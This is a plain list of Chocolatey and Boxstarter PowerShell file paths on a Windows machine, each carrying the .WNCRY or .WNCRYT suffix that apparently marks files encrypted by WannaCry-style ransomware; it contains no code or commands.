C:\Users\All Users\chocolatey\helpers\functions\Set-EnvironmentVariable.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Set-PowerShellExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Set-PowerShellExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Test-ProcessAdminRights.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Test-ProcessAdminRights.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-BinFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-BinFile.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\UnInstall-ChocolateyZipPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\UnInstall-ChocolateyZipPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Update-SessionEnvironment.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Update-SessionEnvironment.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Write-FunctionCallLogMessage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Write-FunctionCallLogMessage.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\setup.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\setup.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxstarterShell.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxstarterShell.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyUninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\setup.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\setup.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Boxstarter.zip.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Boxstarter.zip.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Send-File.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Send-File.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\setup.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\setup.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Confirm-Choice.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Confirm-Choice.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Enter-DotNet4.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Enter-DotNet4.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-CurrentUser.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-CurrentUser.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-HttpResource.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-HttpResource.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsRemote.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsRemote.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Init-Settings.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Init-Settings.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-FromTask.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-FromTask.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Start-TimedSection.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Start-TimedSection.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Stop-TimedSection.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Stop-TimedSection.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Test-Admin.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Test-Admin.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\setup.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\setup.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\setup.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\setup.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-UAC.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-UAC.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-PackageParameters.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-PackageParameters.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-UninstallRegistryKey.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-UninstallRegistryKey.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Install-ChocolateyDesktopLink.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Install-ChocolateyDesktopLink.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateyFailure.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateyFailure.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateySuccess.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateySuccess.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-FileUpdateLog.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-FileUpdateLog.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AppInstallLocation.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AppInstallLocation.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AvailableDriveLetter.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AvailableDriveLetter.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-EffectiveProxy.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-EffectiveProxy.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-PackageCacheLocation.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-PackageCacheLocation.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-WebContent.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-WebContent.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Register-Application.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Register-Application.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Remove-Process.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Remove-Process.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\DotNetFrameworkHelpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\DotNetFrameworkHelpers.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-WindowsUpdateErrorDescription.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-WindowsUpdateErrorDescription.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-WindowsUpdate.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Test-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Test-WindowsUpdate.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\ChocolateyInstall.ps1.WNCRYT
